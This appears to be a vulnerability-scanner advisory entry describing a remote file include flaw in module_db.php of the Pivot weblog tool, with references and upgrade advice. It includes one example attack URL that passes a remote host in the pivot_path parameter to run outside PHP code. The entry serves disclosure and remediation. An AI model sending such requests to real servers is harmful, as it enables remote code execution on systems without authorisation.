| VID |
21311 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The Pivot software is vulnerable to a Remote File Include Vulnerability in 'module_db.php' file. Pivot is an application that is used to create Weblogs without the assistance of a database. Several versions of Pivot contain the vulnerability that can allow a remote attacker to include any file and php code, caused by a failure of the application to properly sanitize user-supplied input before including it as a parameter to a file include function call. By sending a specially-crafted URL request to the module_db.php file using the path variable to specify a malicious file from a remote system as a parameter, a remote attacker could execute arbitrary code on the system with Local System privileges.
http://[target_server]/pivot/modules/module_db.php?pivot_path=http://xxxxxxxxxx/
* References: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html
* Platforms Affected: Pivot Web Log Tool 1.14 prior Any operating system Any version |
| Recommendation |
Upgrade to the latest version of Pivot (1.14.1 or later), available from the Pivot web site at https://sourceforge.net/project/showfiles.php?group_id=67653&package_id=65955&release_id=245757
As a workaround, apply the unofficial patch for this vulnerability, available from the Full-Disclosure Mailing List posting dated Mon Jun 14 2004 - 15:59:58 CDT at http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html |
| Related URL |
(CVE) |
| Related URL |
10553 (SecurityFocus) |
| Related URL |
16418 (ISS) |
|